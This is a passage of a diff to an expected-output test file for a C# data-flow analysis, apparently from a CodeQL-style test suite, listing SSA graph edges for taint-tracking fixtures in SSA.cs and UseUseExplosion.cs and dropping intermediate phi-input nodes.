+| SSA.cs:102:13:102:33 | [input] SSA phi read(nonSink0) | SSA.cs:130:39:130:46 | access to local variable nonSink0 | +| SSA.cs:102:13:102:33 | [input] SSA phi read(nonTainted) | SSA.cs:115:13:115:22 | access to parameter nonTainted | | SSA.cs:104:13:104:20 | access to local variable nonSink3 | SSA.cs:104:13:104:31 | SSA def(nonSink3) | | SSA.cs:104:13:104:31 | SSA def(nonSink3) | SSA.cs:106:21:106:28 | access to local variable nonSink3 | | SSA.cs:104:13:104:31 | SSA def(nonSink3) | SSA.cs:108:21:108:28 | access to local variable nonSink3 | @@ -800,19 +769,14 @@ | SSA.cs:105:17:105:26 | [post] access to parameter nonTainted | SSA.cs:108:17:108:29 | [input] SSA phi read(nonTainted) | | SSA.cs:105:17:105:26 | access to parameter nonTainted | SSA.cs:106:17:106:29 | [input] SSA phi read(nonTainted) | | SSA.cs:105:17:105:26 | access to parameter nonTainted | SSA.cs:108:17:108:29 | [input] SSA phi read(nonTainted) | -| SSA.cs:106:17:106:29 | [input] SSA phi read(nonSink0) | SSA.cs:110:9:110:32 | SSA phi read(nonSink0) | -| SSA.cs:106:17:106:29 | [input] SSA phi read(nonTainted) | SSA.cs:110:9:110:32 | SSA phi read(nonTainted) | -| SSA.cs:106:17:106:29 | [input] SSA phi(nonSink3) | SSA.cs:110:9:110:32 | SSA phi(nonSink3) | -| SSA.cs:106:21:106:28 | [post] access to local variable nonSink3 | SSA.cs:106:17:106:29 | [input] SSA phi(nonSink3) | -| SSA.cs:106:21:106:28 | access to local variable nonSink3 | SSA.cs:106:17:106:29 | [input] SSA phi(nonSink3) | -| SSA.cs:108:17:108:29 | [input] SSA phi read(nonSink0) | SSA.cs:110:9:110:32 | SSA phi read(nonSink0) | -| SSA.cs:108:17:108:29 | [input] SSA phi read(nonTainted) | SSA.cs:110:9:110:32 | SSA phi read(nonTainted) | -| SSA.cs:108:17:108:29 | [input] SSA phi(nonSink3) | SSA.cs:110:9:110:32 | SSA phi(nonSink3) | -| SSA.cs:108:21:108:28 | [post] access to local variable nonSink3 | SSA.cs:108:17:108:29 | [input] SSA phi(nonSink3) | -| SSA.cs:108:21:108:28 | access to local variable nonSink3 | SSA.cs:108:17:108:29 | [input] SSA phi(nonSink3) | -| SSA.cs:110:9:110:32 | SSA phi read(nonSink0) | SSA.cs:130:39:130:46 | access to local variable nonSink0 | -| SSA.cs:110:9:110:32 | SSA phi read(nonTainted) | SSA.cs:115:13:115:22 | access to parameter nonTainted | -| SSA.cs:110:9:110:32 | SSA phi(nonSink3) | SSA.cs:110:23:110:30 | access to local variable nonSink3 | +| SSA.cs:106:17:106:29 | [input] SSA phi read(nonSink0) | SSA.cs:130:39:130:46 | access to local variable nonSink0 | +| SSA.cs:106:17:106:29 | [input] SSA phi read(nonTainted) | SSA.cs:115:13:115:22 | access to parameter nonTainted | +| SSA.cs:106:21:106:28 | [post] access to local variable nonSink3 | SSA.cs:110:23:110:30 | access to local variable nonSink3 | +| SSA.cs:106:21:106:28 | access to local variable nonSink3 | SSA.cs:110:23:110:30 | access to local variable nonSink3 | +| SSA.cs:108:17:108:29 | [input] SSA phi read(nonSink0) | SSA.cs:130:39:130:46 | access to local variable nonSink0 | +| SSA.cs:108:17:108:29 | [input] SSA phi read(nonTainted) | SSA.cs:115:13:115:22 | access to parameter nonTainted | +| SSA.cs:108:21:108:28 | [post] access to local variable nonSink3 | SSA.cs:110:23:110:30 | access to local variable nonSink3 | +| SSA.cs:108:21:108:28 | access to local variable nonSink3 | SSA.cs:110:23:110:30 | access to local variable nonSink3 | | SSA.cs:110:23:110:30 | SSA def(nonSink3) | SSA.cs:111:15:111:22 | access to local variable nonSink3 | | SSA.cs:110:23:110:30 | [post] access to local variable nonSink3 | SSA.cs:110:23:110:30 | SSA def(nonSink3) | | SSA.cs:110:23:110:30 | access to local variable nonSink3 | SSA.cs:110:23:110:30 | SSA def(nonSink3) | @@ -826,15 +790,14 @@ | SSA.cs:114:9:114:14 | access to field S | SSA.cs:115:13:115:33 | [input] SSA phi read(this.S) | | SSA.cs:114:9:114:14 | access to field S | SSA.cs:117:13:117:18 | access to field S | | SSA.cs:114:9:114:28 | access to field SsaFieldSink1 | SSA.cs:114:9:114:33 | SSA def(this.S.SsaFieldSink1) | -| SSA.cs:114:9:114:33 | SSA def(this.S.SsaFieldSink1) | SSA.cs:115:13:115:33 | [input] SSA phi(this.S.SsaFieldSink1) | +| SSA.cs:114:9:114:33 | SSA def(this.S.SsaFieldSink1) | SSA.cs:123:23:123:28 | SSA qualifier def(this.S.SsaFieldSink1) | | SSA.cs:114:32:114:33 | "" | SSA.cs:114:9:114:28 | access to field SsaFieldSink1 | | SSA.cs:115:13:115:22 | [post] access to parameter nonTainted | SSA.cs:115:13:115:33 | [input] SSA phi read(nonTainted) | | SSA.cs:115:13:115:22 | [post] access to parameter nonTainted | SSA.cs:118:17:118:26 | access to parameter nonTainted | | SSA.cs:115:13:115:22 | access to parameter nonTainted | SSA.cs:115:13:115:33 | [input] SSA phi read(nonTainted) | | SSA.cs:115:13:115:22 | access to parameter nonTainted | SSA.cs:118:17:118:26 | access to parameter nonTainted | -| SSA.cs:115:13:115:33 | [input] SSA phi read(nonTainted) | SSA.cs:123:9:123:30 | SSA phi read(nonTainted) | -| SSA.cs:115:13:115:33 | [input] SSA phi read(this.S) | SSA.cs:123:9:123:30 | SSA phi read(this.S) | -| SSA.cs:115:13:115:33 | [input] SSA phi(this.S.SsaFieldSink1) | SSA.cs:123:9:123:30 | SSA phi(this.S.SsaFieldSink1) | +| SSA.cs:115:13:115:33 | [input] SSA phi read(nonTainted) | SSA.cs:128:13:128:22 | access to parameter nonTainted | +| SSA.cs:115:13:115:33 | [input] SSA phi read(this.S) | SSA.cs:123:23:123:28 | access to field S | | SSA.cs:117:13:117:16 | [post] this access | SSA.cs:119:21:119:24 | this access | | SSA.cs:117:13:117:16 | [post] this access | SSA.cs:121:21:121:24 | this access | | SSA.cs:117:13:117:16 | this access | SSA.cs:119:21:119:24 | this access | @@ -851,27 +814,20 @@ | SSA.cs:118:17:118:26 | [post] access to parameter nonTainted | SSA.cs:121:17:121:41 | [input] SSA phi read(nonTainted) | | SSA.cs:118:17:118:26 | access to parameter nonTainted | SSA.cs:119:17:119:41 | [input] SSA phi read(nonTainted) | | SSA.cs:118:17:118:26 | access to parameter nonTainted | SSA.cs:121:17:121:41 | [input] SSA phi read(nonTainted) | -| SSA.cs:119:17:119:41 | [input] SSA phi read(nonTainted) | SSA.cs:123:9:123:30 | SSA phi read(nonTainted) | -| SSA.cs:119:17:119:41 | [input] SSA phi read(this.S) | SSA.cs:123:9:123:30 | SSA phi read(this.S) | -| SSA.cs:119:17:119:41 | [input] SSA phi(this.S.SsaFieldSink1) | SSA.cs:123:9:123:30 | SSA phi(this.S.SsaFieldSink1) | +| SSA.cs:119:17:119:41 | [input] SSA phi read(nonTainted) | SSA.cs:128:13:128:22 | access to parameter nonTainted | | SSA.cs:119:21:119:24 | [post] this access | SSA.cs:123:23:123:26 | this access | | SSA.cs:119:21:119:24 | this access | SSA.cs:123:23:123:26 | this access | -| SSA.cs:119:21:119:26 | [post] access to field S | SSA.cs:119:17:119:41 | [input] SSA phi read(this.S) | -| SSA.cs:119:21:119:26 | access to field S | SSA.cs:119:17:119:41 | [input] SSA phi read(this.S) | -| SSA.cs:119:21:119:40 | [post] access to field SsaFieldSink1 | SSA.cs:119:17:119:41 | [input] SSA phi(this.S.SsaFieldSink1) | -| SSA.cs:119:21:119:40 | access to field SsaFieldSink1 | SSA.cs:119:17:119:41 | [input] SSA phi(this.S.SsaFieldSink1) | -| SSA.cs:121:17:121:41 | [input] SSA phi read(nonTainted) | SSA.cs:123:9:123:30 | SSA phi read(nonTainted) | -| SSA.cs:121:17:121:41 | [input] SSA phi read(this.S) | SSA.cs:123:9:123:30 | SSA phi read(this.S) | -| SSA.cs:121:17:121:41 | [input] SSA phi(this.S.SsaFieldSink1) | SSA.cs:123:9:123:30 | SSA phi(this.S.SsaFieldSink1) | +| SSA.cs:119:21:119:26 | [post] access to field S | SSA.cs:123:23:123:28 | access to field S | +| SSA.cs:119:21:119:26 | access to field S | SSA.cs:123:23:123:28 | access to field S | +| SSA.cs:119:21:119:40 | [post] access to field SsaFieldSink1 | SSA.cs:123:23:123:28 | SSA qualifier def(this.S.SsaFieldSink1) | +| SSA.cs:119:21:119:40 | access to field SsaFieldSink1 | SSA.cs:123:23:123:28 | SSA qualifier def(this.S.SsaFieldSink1) | +| SSA.cs:121:17:121:41 | [input] SSA phi read(nonTainted) | SSA.cs:128:13:128:22 | access to parameter nonTainted | | SSA.cs:121:21:121:24 | [post] this access | SSA.cs:123:23:123:26 | this access | | SSA.cs:121:21:121:24 | this access | SSA.cs:123:23:123:26 | this access | -| SSA.cs:121:21:121:26 | [post] access to field S | SSA.cs:121:17:121:41 | [input] SSA phi read(this.S) | -| SSA.cs:121:21:121:26 | access to field S | SSA.cs:121:17:121:41 | [input] SSA phi read(this.S) | -| SSA.cs:121:21:121:40 | [post] access to field SsaFieldSink1 | SSA.cs:121:17:121:41 | [input] SSA phi(this.S.SsaFieldSink1) | -| SSA.cs:121:21:121:40 | access to field SsaFieldSink1 | SSA.cs:121:17:121:41 | [input] SSA phi(this.S.SsaFieldSink1) | -| SSA.cs:123:9:123:30 | SSA phi read(nonTainted) | SSA.cs:128:13:128:22 | access to parameter nonTainted | -| SSA.cs:123:9:123:30 | SSA phi read(this.S) | SSA.cs:123:23:123:28 | access to field S | -| SSA.cs:123:9:123:30 | SSA phi(this.S.SsaFieldSink1) | SSA.cs:123:23:123:28 | SSA qualifier def(this.S.SsaFieldSink1) | +| SSA.cs:121:21:121:26 | [post] access to field S | SSA.cs:123:23:123:28 | access to field S | +| SSA.cs:121:21:121:26 | access to field S | SSA.cs:123:23:123:28 | access to field S | +| SSA.cs:121:21:121:40 | [post] access to field SsaFieldSink1 | SSA.cs:123:23:123:28 | SSA qualifier def(this.S.SsaFieldSink1) | +| SSA.cs:121:21:121:40 | access to field SsaFieldSink1 | SSA.cs:123:23:123:28 | SSA qualifier def(this.S.SsaFieldSink1) | | SSA.cs:123:23:123:26 | [post] this access | SSA.cs:124:15:124:18 | this access | | SSA.cs:123:23:123:26 | this access | SSA.cs:124:15:124:18 | this access | | SSA.cs:123:23:123:28 | SSA def(this.S) | SSA.cs:124:15:124:20 | access to field S | @@ -892,12 +848,11 @@ | SSA.cs:127:9:127:14 | access to field S | SSA.cs:128:13:128:33 | [input] SSA phi read(this.S) | | SSA.cs:127:9:127:14 | access to field S | SSA.cs:130:13:130:18 | access to field S | | SSA.cs:127:9:127:31 | access to field SsaFieldNonSink0 | SSA.cs:127:9:127:36 | SSA def(this.S.SsaFieldNonSink0) | -| SSA.cs:127:9:127:36 | SSA def(this.S.SsaFieldNonSink0) | SSA.cs:128:13:128:33 | [input] SSA phi(this.S.SsaFieldNonSink0) | +| SSA.cs:127:9:127:36 | SSA def(this.S.SsaFieldNonSink0) | SSA.cs:136:23:136:28 | SSA qualifier def(this.S.SsaFieldNonSink0) | | SSA.cs:127:35:127:36 | "" | SSA.cs:127:9:127:31 | access to field SsaFieldNonSink0 | | SSA.cs:128:13:128:22 | [post] access to parameter nonTainted | SSA.cs:131:17:131:26 | access to parameter nonTainted | | SSA.cs:128:13:128:22 | access to parameter nonTainted | SSA.cs:131:17:131:26 | access to parameter nonTainted | -| SSA.cs:128:13:128:33 | [input] SSA phi read(this.S) | SSA.cs:136:9:136:30 | SSA phi read(this.S) | -| SSA.cs:128:13:128:33 | [input] SSA phi(this.S.SsaFieldNonSink0) | SSA.cs:136:9:136:30 | SSA phi(this.S.SsaFieldNonSink0) | +| SSA.cs:128:13:128:33 | [input] SSA phi read(this.S) | SSA.cs:136:23:136:28 | access to field S | | SSA.cs:130:13:130:16 | [post] this access | SSA.cs:132:21:132:24 | this access | | SSA.cs:130:13:130:16 | [post] this access | SSA.cs:134:21:134:24 | this access | | SSA.cs:130:13:130:16 | this access | SSA.cs:132:21:132:24 | this access | @@ -910,24 +865,18 @@ | SSA.cs:130:13:130:46 | SSA def(this.S.SsaFieldNonSink0) | SSA.cs:132:21:132:43 | access to field SsaFieldNonSink0 | | SSA.cs:130:13:130:46 | SSA def(this.S.SsaFieldNonSink0) | SSA.cs:134:21:134:43 | access to field SsaFieldNonSink0 | | SSA.cs:130:39:130:46 | access to local variable nonSink0 | SSA.cs:130:13:130:35 | access to field SsaFieldNonSink0 | -| SSA.cs:132:17:132:44 | [input] SSA phi read(this.S) | SSA.cs:136:9:136:30 | SSA phi read(this.S) | -| SSA.cs:132:17:132:44 | [input] SSA phi(this.S.SsaFieldNonSink0) | SSA.cs:136:9:136:30 | SSA phi(this.S.SsaFieldNonSink0) | | SSA.cs:132:21:132:24 | [post] this access | SSA.cs:136:23:136:26 | this access | | SSA.cs:132:21:132:24 | this access | SSA.cs:136:23:136:26 | this access | -| SSA.cs:132:21:132:26 | [post] access to field S | SSA.cs:132:17:132:44 | [input] SSA phi read(this.S) | -| SSA.cs:132:21:132:26 | access to field S | SSA.cs:132:17:132:44 | [input] SSA phi read(this.S) | -| SSA.cs:132:21:132:43 | [post] access to field SsaFieldNonSink0 | SSA.cs:132:17:132:44 | [input] SSA phi(this.S.SsaFieldNonSink0) | -| SSA.cs:132:21:132:43 | access to field SsaFieldNonSink0 | SSA.cs:132:17:132:44 | [input] SSA phi(this.S.SsaFieldNonSink0) | -| SSA.cs:134:17:134:44 | [input] SSA phi read(this.S) | SSA.cs:136:9:136:30 | SSA phi read(this.S) | -| SSA.cs:134:17:134:44 | [input] SSA phi(this.S.SsaFieldNonSink0) | SSA.cs:136:9:136:30 | SSA phi(this.S.SsaFieldNonSink0) | +| SSA.cs:132:21:132:26 | [post] access to field S | SSA.cs:136:23:136:28 | access to field S | +| SSA.cs:132:21:132:26 | access to field S | SSA.cs:136:23:136:28 | access to field S | +| SSA.cs:132:21:132:43 | [post] access to field SsaFieldNonSink0 | SSA.cs:136:23:136:28 | SSA qualifier def(this.S.SsaFieldNonSink0) | +| SSA.cs:132:21:132:43 | access to field SsaFieldNonSink0 | SSA.cs:136:23:136:28 | SSA qualifier def(this.S.SsaFieldNonSink0) | | SSA.cs:134:21:134:24 | [post] this access | SSA.cs:136:23:136:26 | this access | | SSA.cs:134:21:134:24 | this access | SSA.cs:136:23:136:26 | this access | -| SSA.cs:134:21:134:26 | [post] access to field S | SSA.cs:134:17:134:44 | [input] SSA phi read(this.S) | -| SSA.cs:134:21:134:26 | access to field S | SSA.cs:134:17:134:44 | [input] SSA phi read(this.S) | -| SSA.cs:134:21:134:43 | [post] access to field SsaFieldNonSink0 | SSA.cs:134:17:134:44 | [input] SSA phi(this.S.SsaFieldNonSink0) | -| SSA.cs:134:21:134:43 | access to field SsaFieldNonSink0 | SSA.cs:134:17:134:44 | [input] SSA phi(this.S.SsaFieldNonSink0) | -| SSA.cs:136:9:136:30 | SSA phi read(this.S) | SSA.cs:136:23:136:28 | access to field S | -| SSA.cs:136:9:136:30 | SSA phi(this.S.SsaFieldNonSink0) | SSA.cs:136:23:136:28 | SSA qualifier def(this.S.SsaFieldNonSink0) | +| SSA.cs:134:21:134:26 | [post] access to field S | SSA.cs:136:23:136:28 | access to field S | +| SSA.cs:134:21:134:26 | access to field S | SSA.cs:136:23:136:28 | access to field S | +| SSA.cs:134:21:134:43 | [post] access to field SsaFieldNonSink0 | SSA.cs:136:23:136:28 | SSA qualifier def(this.S.SsaFieldNonSink0) | +| SSA.cs:134:21:134:43 | access to field SsaFieldNonSink0 | SSA.cs:136:23:136:28 | SSA qualifier def(this.S.SsaFieldNonSink0) | | SSA.cs:136:23:136:26 | [post] this access | SSA.cs:137:15:137:18 | this access | | SSA.cs:136:23:136:26 | this access | SSA.cs:137:15:137:18 | this access | | SSA.cs:136:23:136:28 | SSA def(this.S) | SSA.cs:137:15:137:20 | access to field S | @@ -940,12 +889,10 @@ | SSA.cs:146:13:146:13 | access to parameter t | SSA.cs:146:13:146:13 | (...) ... | | SSA.cs:146:13:146:13 | access to parameter t | SSA.cs:149:17:149:17 | access to parameter t | | SSA.cs:147:13:147:13 | access to parameter t | SSA.cs:147:13:147:26 | SSA def(t) | -| SSA.cs:147:13:147:26 | SSA def(t) | SSA.cs:147:13:147:26 | [input] SSA phi(t) | -| SSA.cs:147:13:147:26 | [input] SSA phi(t) | SSA.cs:144:17:144:26 | SSA phi(t) | +| SSA.cs:147:13:147:26 | SSA def(t) | SSA.cs:144:17:144:26 | SSA phi(t) | | SSA.cs:147:17:147:26 | default(...) | SSA.cs:147:13:147:13 | access to parameter t | | SSA.cs:149:13:149:13 | access to parameter t | SSA.cs:149:13:149:17 | SSA def(t) | -| SSA.cs:149:13:149:17 | SSA def(t) | SSA.cs:149:13:149:17 | [input] SSA phi(t) | -| SSA.cs:149:13:149:17 | [input] SSA phi(t) | SSA.cs:144:17:144:26 | SSA phi(t) | +| SSA.cs:149:13:149:17 | SSA def(t) | SSA.cs:144:17:144:26 | SSA phi(t) | | SSA.cs:149:17:149:17 | access to parameter t | SSA.cs:149:13:149:13 | access to parameter t | | SSA.cs:152:36:152:36 | SSA param(t) | SSA.cs:154:13:154:13 | access to parameter t | | SSA.cs:152:36:152:36 | t | SSA.cs:152:36:152:36 | SSA param(t) | @@ -953,8 +900,7 @@ | SSA.cs:154:13:154:13 | access to parameter t | SSA.cs:154:13:154:21 | [input] SSA phi(t) | | SSA.cs:154:13:154:13 | access to parameter t | SSA.cs:155:25:155:25 | access to parameter t | | SSA.cs:154:13:154:21 | [input] SSA phi(t) | SSA.cs:152:17:152:28 | SSA phi(t) | -| SSA.cs:155:13:155:26 | [input] SSA phi(t) | SSA.cs:152:17:152:28 | SSA phi(t) | -| SSA.cs:155:25:155:25 | SSA def(t) | SSA.cs:155:13:155:26 | [input] SSA phi(t) | +| SSA.cs:155:25:155:25 | SSA def(t) | SSA.cs:152:17:152:28 | SSA phi(t) | | SSA.cs:155:25:155:25 | access to parameter t | SSA.cs:155:25:155:25 | SSA def(t) | | SSA.cs:166:10:166:13 | this | SSA.cs:166:19:166:22 | this access | | SSA.cs:166:28:166:31 | null | SSA.cs:166:19:166:24 | access to field S | @@ -963,29 +909,22 @@ | SSA.cs:168:35:168:35 | SSA param(i) | SSA.cs:171:13:171:13 | access to parameter i | | SSA.cs:168:35:168:35 | i | SSA.cs:168:35:168:35 | SSA param(i) | | SSA.cs:170:16:170:23 | access to local variable ssaSink5 | SSA.cs:170:16:170:28 | SSA def(ssaSink5) | -| SSA.cs:170:16:170:28 | SSA def(ssaSink5) | SSA.cs:171:13:171:19 | [input] SSA phi(ssaSink5) | +| SSA.cs:170:16:170:28 | SSA def(ssaSink5) | SSA.cs:180:15:180:22 | access to local variable ssaSink5 | | SSA.cs:170:27:170:28 | "" | SSA.cs:170:16:170:23 | access to local variable ssaSink5 | | SSA.cs:171:13:171:13 | access to parameter i | SSA.cs:171:13:171:15 | SSA def(i) | -| SSA.cs:171:13:171:15 | SSA def(i) | SSA.cs:174:13:178:13 | [input] SSA phi(i) | -| SSA.cs:171:13:171:19 | [input] SSA phi(ssaSink5) | SSA.cs:180:9:180:24 | SSA phi(ssaSink5) | +| SSA.cs:171:13:171:15 | SSA def(i) | SSA.cs:174:20:174:20 | access to parameter i | | SSA.cs:173:13:173:20 | access to local variable ssaSink5 | SSA.cs:173:13:173:30 | SSA def(ssaSink5) | -| SSA.cs:173:13:173:30 | SSA def(ssaSink5) | SSA.cs:174:13:178:13 | [input] SSA phi read(ssaSink5) | +| SSA.cs:173:13:173:30 | SSA def(ssaSink5) | SSA.cs:174:20:174:20 | SSA phi read(ssaSink5) | | SSA.cs:173:24:173:30 | access to parameter tainted | SSA.cs:173:13:173:20 | access to local variable ssaSink5 | -| SSA.cs:174:13:178:13 | [input] SSA phi read(ssaSink5) | SSA.cs:174:20:174:20 | SSA phi read(ssaSink5) | -| SSA.cs:174:13:178:13 | [input] SSA phi(i) | SSA.cs:174:20:174:20 | SSA phi(i) | | SSA.cs:174:20:174:20 | SSA phi read(ssaSink5) | SSA.cs:174:20:174:26 | [input] SSA phi(ssaSink5) | | SSA.cs:174:20:174:20 | SSA phi read(ssaSink5) | SSA.cs:176:21:176:28 | access to local variable ssaSink5 | -| SSA.cs:174:20:174:20 | SSA phi(i) | SSA.cs:174:20:174:20 | access to parameter i | | SSA.cs:174:20:174:20 | access to parameter i | SSA.cs:174:20:174:22 | SSA def(i) | -| SSA.cs:174:20:174:22 | SSA def(i) | SSA.cs:177:17:177:29 | [input] SSA phi(i) | -| SSA.cs:174:20:174:26 | [input] SSA phi(ssaSink5) | SSA.cs:180:9:180:24 | SSA phi(ssaSink5) | +| SSA.cs:174:20:174:22 | SSA def(i) | SSA.cs:174:20:174:20 | access to parameter i | +| SSA.cs:174:20:174:26 | [input] SSA phi(ssaSink5) | SSA.cs:180:15:180:22 | access to local variable ssaSink5 | | SSA.cs:176:21:176:28 | [post] access to local variable ssaSink5 | SSA.cs:177:21:177:28 | access to local variable ssaSink5 | | SSA.cs:176:21:176:28 | access to local variable ssaSink5 | SSA.cs:177:21:177:28 | access to local variable ssaSink5 | -| SSA.cs:177:17:177:29 | [input] SSA phi read(ssaSink5) | SSA.cs:174:20:174:20 | SSA phi read(ssaSink5) | -| SSA.cs:177:17:177:29 | [input] SSA phi(i) | SSA.cs:174:20:174:20 | SSA phi(i) | -| SSA.cs:177:21:177:28 | [post] access to local variable ssaSink5 | SSA.cs:177:17:177:29 | [input] SSA phi read(ssaSink5) | -| SSA.cs:177:21:177:28 | access to local variable ssaSink5 | SSA.cs:177:17:177:29 | [input] SSA phi read(ssaSink5) | -| SSA.cs:180:9:180:24 | SSA phi(ssaSink5) | SSA.cs:180:15:180:22 | access to local variable ssaSink5 | +| SSA.cs:177:21:177:28 | [post] access to local variable ssaSink5 | SSA.cs:174:20:174:20 | SSA phi read(ssaSink5) | +| SSA.cs:177:21:177:28 | access to local variable ssaSink5 | SSA.cs:174:20:174:20 | SSA phi read(ssaSink5) | | Splitting.cs:3:18:3:18 | SSA param(b) | Splitting.cs:6:13:6:13 | access to parameter b | | Splitting.cs:3:18:3:18 | b | Splitting.cs:3:18:3:18 | SSA param(b) | | Splitting.cs:3:28:3:34 | SSA param(tainted) | Splitting.cs:5:17:5:23 | access to parameter tainted | @@ -1805,509 +1744,408 @@ | UseUseExplosion.cs:24:1689:24:1692 | access to property Prop | UseUseExplosion.cs:24:1708:24:1713 | [input] SSA phi read(this.Prop) | | UseUseExplosion.cs:24:1689:24:1692 | this access | UseUseExplosion.cs:24:1708:24:1713 | this access | | UseUseExplosion.cs:24:1689:24:1692 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1699:24:1701 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | +| UseUseExplosion.cs:24:1699:24:1701 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1699:24:1701 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | -| UseUseExplosion.cs:24:1708:24:1713 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1708:24:1713 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1708:24:1713 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1708:24:1713 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1708:24:1713 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1712:24:1712 | access to local variable x | UseUseExplosion.cs:24:1708:24:1713 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1723:24:1728 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1723:24:1728 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1712:24:1712 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1723:24:1728 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1723:24:1728 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1723:24:1728 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1727:24:1727 | access to local variable x | UseUseExplosion.cs:24:1723:24:1728 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1738:24:1743 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1738:24:1743 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1727:24:1727 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1738:24:1743 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1738:24:1743 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1738:24:1743 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1742:24:1742 | access to local variable x | UseUseExplosion.cs:24:1738:24:1743 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1753:24:1758 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1753:24:1758 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1742:24:1742 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1753:24:1758 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1753:24:1758 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1753:24:1758 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1757:24:1757 | access to local variable x | UseUseExplosion.cs:24:1753:24:1758 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1768:24:1773 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1768:24:1773 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1757:24:1757 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1768:24:1773 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1768:24:1773 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1768:24:1773 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1772:24:1772 | access to local variable x | UseUseExplosion.cs:24:1768:24:1773 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1783:24:1788 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1783:24:1788 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1772:24:1772 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1783:24:1788 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1783:24:1788 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1783:24:1788 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1787:24:1787 | access to local variable x | UseUseExplosion.cs:24:1783:24:1788 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1798:24:1803 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1798:24:1803 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1787:24:1787 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1798:24:1803 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1798:24:1803 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1798:24:1803 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1802:24:1802 | access to local variable x | UseUseExplosion.cs:24:1798:24:1803 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1813:24:1818 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1813:24:1818 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1802:24:1802 | access to local 